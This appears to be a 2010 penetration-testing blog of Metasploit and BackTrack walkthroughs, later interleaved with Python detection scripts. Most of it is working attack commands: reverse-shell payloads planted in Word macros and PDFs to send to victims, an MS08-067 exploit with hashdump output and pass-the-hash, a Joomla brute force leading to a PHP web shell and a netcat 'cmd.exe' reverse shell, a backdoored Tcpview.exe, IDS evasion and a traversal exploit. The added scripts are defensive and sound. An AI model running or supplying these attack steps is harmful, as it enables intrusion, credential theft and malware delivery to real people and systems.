Tuesday, May 18, 2010

Client-side Attack by Using Evil MS-Office Apps (Excel or Word)

Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe

Step 2: Convert your newly created payload to a VBA (Visual Basic for Applications) script

cd /pentest/exploits/framework3/tools

./exe2vba.rb /tmp/payload.exe /tmp/payload.vba

Step 3: Copy and paste the contents of payload.vba into your evil file

Open your evil file (Excel or Word). Select: Tools > Macro > Visual Basic Editor, paste the contents of your payload.vba, then save the file.

Step 4: Send the evil file to your client

Step 5: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit

Thursday, May 13, 2010

Autopwn = Ninja Script!

msf > db_driver sqlite3
msf > db_create pentest
msf > db_nmap -sS -p135,139,445 192.168.1.200
msf > db_hosts
msf > db_services
msf > db_autopwn -t -p -e -r

SMB Pass the Hash

Step 1:
Get the hashes from the target machine (e.g. LON-DC1 = 192.168.1.200)
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.200
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > set TARGET 7
msf > exploit

meterpreter > run hashdump

Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Step 2:
Copy the LM:NT hash and pass it to another host (here 192.168.1.110) with psexec

msf > use windows/smb/psexec
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.110
msf > set LHOST 192.168.1.252
msf > set LPORT 6666
msf > set SMBUser Administrator
msf > set SMBPass 921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42
msf > exploit
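
As an added example (not part of the original post), a small Python triage script for hashdump output in the user:RID:LM:NT::: format shown above. It flags what a defender reading the same dump would act on: accounts with a blank password, accounts for which an LM hash is still stored, and accounts sharing one NT hash, which is exactly what lets the hash taken from one host be passed to another. The first two sample lines are the ones above; the svc_backup line is constructed to show the shared-hash case.

```python
# Added example, not from the original post: triage lines in the
# "user:RID:LM:NT:::" format that Meterpreter's hashdump prints.
import re

# Hashes of the empty string; Windows stores these when LM storage is
# disabled (LM field) or the password is blank (NT field).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# First two lines are from the post; svc_backup is a constructed account that
# reuses the Administrator password.
SAMPLE_HASHDUMP = """\
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
"""

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_hashdump(text):
    """Return a list of (user, rid, lm, nt) tuples; malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            accounts.append((user, int(rid), lm.lower(), nt.lower()))
    return accounts


def triage(accounts):
    """Map each user to the findings a defender would act on."""
    findings = {user: [] for user, _, _, _ in accounts}
    nt_owners = {}  # NT hash -> users that have it
    for user, rid, lm, nt in accounts:
        if nt == EMPTY_NT:
            findings[user].append("blank password")
        if lm != EMPTY_LM:
            findings[user].append("LM hash stored (crackable); disable LM storage")
        if rid == 500:
            findings[user].append("built-in Administrator; hash is valid on every host sharing this password")
        nt_owners.setdefault(nt, []).append(user)
    # The same NT hash on two accounts means one password unlocks both.
    for nt, users in nt_owners.items():
        if nt != EMPTY_NT and len(users) > 1:
            for u in users:
                others = ", ".join(x for x in users if x != u)
                findings[u].append("NT hash shared with: " + others)
    return findings


if __name__ == "__main__":
    for user, notes in triage(parse_hashdump(SAMPLE_HASHDUMP)).items():
        print(user, "->", "; ".join(notes) or "no findings")
```

On the sample, Guest is reported with a blank password, Administrator with an LM hash still stored, and Administrator and svc_backup as sharing one NT hash; the last finding is the one that makes the psexec step above work against a second host.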

Client-side Attack by Using Evil PDF

Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe

Step 2: Create an evil pdf

msf > use windows/fileformat/adobe_pdf_embedded_exe
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set EXENAME /tmp/payload.exe
msf > set FILENAME /tmp/BestComputerGuide.pdf
msf > set INFILENAME /tmp/Report.pdf
msf > set OUTPUTPATH /tmp/
msf > exploit

Note:
EXENAME is your payload/shellcode
FILENAME is your evil pdf file
INFILENAME is your original pdf file
OUTPUTPATH is your output directory

Result: /tmp/BestComputerGuide.pdf

Step 3: Send the evil pdf file to your client

Step 4: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
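
Added example (not part of the original post, and not Metasploit code): a static triage check for PDFs of the kind this post produces, meaning a document that carries an embedded executable plus an action to open it. The script counts risky PDF name tokens the way tools such as pdfid do, after undoing the #xx escaping PDF allows inside names, so /Emb#65ddedFile still counts as /EmbeddedFile. That the module pairs the embedded file with a Launch action is an assumption here; the sample document is a constructed fragment, not module output, and is not a valid PDF.

```python
# Added example, not from the original post: count risky PDF name tokens
# (embedded files, launch and open actions, JavaScript) in a document.
import re

# Name tokens whose presence in a mailed document deserves a look.
RISKY_NAMES = ("/EmbeddedFile", "/Launch", "/JavaScript", "/JS", "/OpenAction", "/AA")

# A PDF name token: slash followed by regular characters.
NAME_RE = re.compile(rb"/[^\s/<>\[\]()%]+")


def unescape_name(token):
    """Resolve #xx hex escapes inside a PDF name token (/Laun#63h -> /Launch)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), token)


def count_risky_names(pdf_bytes):
    """Return {name: count} for every RISKY_NAMES token found, after unescaping."""
    counts = {name: 0 for name in RISKY_NAMES}
    for token in NAME_RE.findall(pdf_bytes):
        name = unescape_name(token).decode("latin-1")
        if name in counts:
            counts[name] += 1
    return counts


def verdict(pdf_bytes):
    """Return the list of reasons this document should be quarantined for review."""
    counts = count_risky_names(pdf_bytes)
    reasons = []
    if counts["/EmbeddedFile"] and counts["/Launch"]:
        reasons.append("embedded file plus Launch action: document can start an attachment")
    if counts["/OpenAction"] or counts["/AA"]:
        reasons.append("automatic action on open")
    if counts["/JavaScript"] or counts["/JS"]:
        reasons.append("contains JavaScript")
    return reasons


# Constructed fragment standing in for a trojanised PDF; not a valid document.
# Two names are hex-escaped to show why plain string matching is not enough.
SAMPLE_PDF = (
    b"%PDF-1.6\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj\n"
    b"4 0 obj << /Type /Filespec /F (payload.exe) /EF << /F 6 0 R >> >> endobj\n"
    b"5 0 obj << /Type /Action /S /Laun#63h /F 4 0 R >> endobj\n"
    b"6 0 obj << /Type /Emb#65ddedFile /Length 0 >> stream\nendstream endobj\n"
    b"%%EOF\n"
)

# Constructed benign fragment for comparison.
BENIGN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"

if __name__ == "__main__":
    print(count_risky_names(SAMPLE_PDF))
    for reason in verdict(SAMPLE_PDF):
        print("-", reason)
```

A mail gateway or endpoint check of this kind does not need to parse the PDF object tree; counting the names is enough to decide which attachments an analyst should open in a sandbox rather than letting them reach a user's Reader.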

Wednesday, May 12, 2010

Fabrikam Website Pen-Test

Step 1:
Find the Admin password (Password Guessing, Brute Force or Dictionary attack).
Tools: hydra or brutus

Example:
hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get

hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get-form

Step 2:
Go to http://www.fabrikam.com/administrator/ and log in with the username and password you obtained in Step 1.

Download a Joomla extension (e.g. GalleryXML, a photo gallery) from:
http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/12504
Save it to any folder you want (e.g. the Z:\Tools\PHP Shell folder).

Step 3:
Extract com_galleryxml.zip to Z:\Tools\PHP Shell folder.

Step 4:
Edit the galleryxml.xml control file (the extension manifest) and list dshell.php (the PHP shell) in its admin section.

Step 5:
Copy dshell.php to com_galleryxml/admin folder.

Step 6:
Archive or zip the contents of com_galleryxml folder into com_galleryxml.zip.

Step 7:
Use "Extension Manager -> Upload & Install", browse to com_galleryxml.zip and upload it.

Step 8:
Launch the PHP Shell from:
http://www.fabrikam.com/administrator/components/com_galleryxml/dshell.php

Step 9:
Using the upload function of dshell.php, upload nc.exe to the remote server.

Step 10:
From the Pen-Tester machine, type:
nc -v -l -p443

From the dshell.php page, execute Netcat by typing:
nc -v 131.107.1.222 443 -d -e cmd.exe

If the connection succeeds, you get a command prompt on your machine.
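
Added example (not part of the original post, and not Joomla or hydra code): the same walkthrough seen from the web server's access log. The script parses Apache common-log lines and raises two alerts: one source making many requests to /administrator/index.php within a minute (the brute force of Step 1), and any direct request for a .php file under /administrator/components/, which a Joomla site normally does not serve directly and which matches the dshell.php URL in Step 8. The log lines are constructed; the 20-requests-per-60-seconds threshold is an assumption to tune per site.

```python
# Added example, not from the original post: detect an admin login brute force
# and direct component-file execution in Apache access logs.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache common log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

ADMIN_LOGIN = "/administrator/index.php"
# Joomla component code is included via index.php; a direct hit on a .php file
# under the components directory is anomalous (this is where dshell.php lands).
COMPONENT_PHP = re.compile(r"^/administrator/components/[^?]*\.php(\?|$)")


def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, window=timedelta(seconds=60), threshold=20):
    """Return (alert, source_ip, detail) tuples for the two behaviours above."""
    alerts = []
    login_hits = defaultdict(list)  # ip -> timestamps of admin login requests
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].split("?", 1)[0] == ADMIN_LOGIN:
            login_hits[rec["ip"]].append(rec["ts"])
        if COMPONENT_PHP.match(rec["path"]):
            alerts.append(("webshell_candidate", rec["ip"], rec["path"]))
    # Sliding window over each source's login requests; one alert per source.
    for ip, times in login_hits.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append(("admin_login_bruteforce", ip,
                               f"{end - start + 1} requests in {window.seconds}s"))
                break
    return alerts


def sample_log():
    """Constructed log: 25 login attempts in 25 s, two benign lines, one shell hit."""
    base = datetime(2010, 5, 12, 10, 0, 0)
    lines = []
    for i in range(25):
        ts = (base + timedelta(seconds=i)).strftime("%d/%b/%Y:%H:%M:%S") + " +0000"
        lines.append(f'131.107.1.222 - - [{ts}] "POST /administrator/index.php HTTP/1.1" 200 5120')
    lines.append('10.0.0.5 - - [12/May/2010:10:00:30 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 8192')
    lines.append('10.0.0.5 - - [12/May/2010:10:00:31 +0000] "GET /administrator/index.php HTTP/1.1" 200 5120')
    lines.append('131.107.1.222 - - [12/May/2010:10:05:00 +0000] '
                 '"GET /administrator/components/com_galleryxml/dshell.php HTTP/1.1" 200 3000')
    return lines


if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

The brute-force rule counts requests rather than failed status codes because the Joomla administrator login answers a wrong password with a 200 and the login form again, so status alone would miss it; the component-file rule needs no threshold at all.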

References:
http://docs.joomla.org/How_you_reset_an_administrator_password%3F
http://forum.joomla.org/viewtopic.php?t=10985
http://community.contractwebdevelopment.com/joomla-how-reset-super-admin-password
http://www.dart-creations.com/joomla/joomla-tips-and-tricks/25-forgot-your-super-administrator-password.html

Tuesday, May 11, 2010

My Sample Report for VA & PT

Here is my sample report, which can be used for vulnerability analysis and pen-test reporting.

Download Sample Report (VA-PT)

Monday, May 10, 2010

Download External Meterpreter Scripts and Tool

ifconfig eth1 up
ifconfig eth1 192.168.1.x/24
route add default gw 192.168.1.x

cd /pentest/exploits/framework3/scripts/meterpreter

wget http://www.darkoperator.com/meterpreter/disable_audit.rb
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb

cd /pentest/exploits/framework3/plugins
wget http://www.room362.com/scripts-and-programs/metasploit/mini-3.3-dev.exe

Testing IDS with Encoded Payload

Step 1: On TEST-BT4, create an Encoded EXE Payload

./msfpayload windows/shell_reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t exe -o /tmp/payload.exe

Step 2: Copy the newly created Encoded EXE Payload to DEN-WEB2

Step 3: On TEST-BT4, launch Netcat in Listening Mode

nc -v -l -p 443
or
cd /pentest/exploits/framework3
./msfconsole

msf > use multi/handler
msf > set PAYLOAD windows/shell_reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit

Step 4: On DEN-WEB2, launch the Encoded EXE Payload (payload.exe)

You should see a reverse connection from DEN-WEB2 to TEST-BT4.

Advanced Topic: Embedding an Encoded Payload in a Legitimate Program (Reverse TCP Shell Backdoor)

Legitimate: Tcpview.exe
Backdoor: Tcpview2.exe

./msfpayload windows/shell/reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe

Testing IDS with Sample Attacks

Port Scanning

Attacks:
nmap -sS 131.107.1.254
nmap -sU 131.107.1.254
nmap -sT 131.107.1.254

Snort: SNMP AgentX/tcp request -or- SNMP request tcp
Category: Attempted Information Leak

IIS Unicode Directory Traversal Exploit Test

Attack:
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
press Enter twice (the empty line ends the request)

Snort: (http_inspect) DOUBLE DECODING ATTACK
Category: unclassified

Apache Directory Access Test

Attack:
http://131.107.1.254/.htaccess
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/.htaccess
press Enter twice (the empty line ends the request)

Snort: WEB-MISC .htaccess access
Category: attempted-recon

Attack:
http://131.107.1.254/robots.txt
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/robots.txt
press Enter twice (the empty line ends the request)

Snort: WEB-MISC robots.txt access
Category: web-application-activity
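
Added example (not part of the original post, and not Snort's code): a Python request-path inspector that mirrors the checks behind the three Snort alerts above, for the IIS Unicode traversal test and the two Apache directory access tests. It percent-decodes a path until it stops changing and counts the rounds (two rounds on ..%255c.. is the double decoding that http_inspect reports), folds backslashes to slashes before looking for .. traversal segments, and flags requests for .htaccess and robots.txt. The sample paths are the ones from the Attack: lines, plus a constructed single-encoded variant to show why the round count matters.

```python
# Added example, not from the original post: flag double-decoded traversal and
# sensitive-file access in request paths, the way an HTTP inspector does.
from urllib.parse import unquote

SENSITIVE_FILES = {".htaccess", "robots.txt"}
MAX_ROUNDS = 4  # guard against pathological nested encoding


def normalise(path):
    """Percent-decode until stable, then fold backslashes to slashes.

    Returns (final_path, decode_rounds). More than one round means the client
    sent a double-encoded path, which is what http_inspect calls a double
    decoding attack: a single-pass decoder would not see the traversal.
    """
    rounds = 0
    current = path
    while rounds < MAX_ROUNDS:
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current.replace("\\", "/"), rounds


def inspect(path):
    """Return the list of alert names this request path would raise."""
    alerts = []
    normalised, rounds = normalise(path)
    if rounds > 1:
        alerts.append("DOUBLE DECODING ATTACK")
    # Drop the query string, then look for a parent-directory segment.
    segments = normalised.split("?", 1)[0].split("/")
    if ".." in segments:
        alerts.append("DIRECTORY TRAVERSAL")
    if segments and segments[-1] in SENSITIVE_FILES:
        alerts.append(f"{segments[-1]} access")
    return alerts


# Paths from the post, plus a constructed single-encoded traversal and a benign page.
SAMPLE_PATHS = [
    "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%5c../winnt/system32/cmd.exe?/c+dir",
    "/.htaccess",
    "/robots.txt",
    "/index.html",
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(p, "->", inspect(p) or "clean")
```

Note that the single-encoded ..%5c.. variant still raises the traversal alert but not the double-decoding one; the first decode already exposes it, which is why the two Snort signatures are separate.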

Ping Flood (Simple DoS Attack)

Attack:
ping -l 65000 131.107.1.254 (Windows)
or
ping -s 65000 131.107.1.254 (Linux)

Snort: ICMP L3retriever Ping
Category: attempted-recon

IDS Evasion Attack

Attack:
nmap -sS -PN -p80,443 -T1 131.107.1.254

Installing Nessus on BackTrack and Ubuntu Desktop

Step 1: Download from http://www.nessus.org and Install Nessus

Filename: Nessus-4.2.2-ubuntu810_i386.deb
Save in /tmp/ directory

Installing Nessus with Debian Package Manager

cd /tmp
dpkg -i Nessus-4.2.2-ubuntu810_i386.deb

Step 2: Add Nessus User

cd /opt/nessus/sbin
./nessus-adduser

Step 3: Register Nessus and Download All Plugins

Visit http://www.nessus.org/plugins/?view=homefeed
Register with your email address.
Open your email and get the registration/serial number.

cd /opt/nessus/bin
./nessus-fetch --register serial_number

Example:

./nessus-fetch --register 2B92-597B-2D44-C737-2309

Step 4: Launch Nessus Server and Apply All Plugins

cd /opt/nessus/sbin
./nessus-service

or

/etc/init.d/nessusd start

Step 5: Launch Nessus Client

https://localhost:8834/

Step 6: Update Plugins

cd /opt/nessus/sbin
./nessus-update-plugins

Nessus Plugins located at: /opt/nessus/lib/nessus/plugins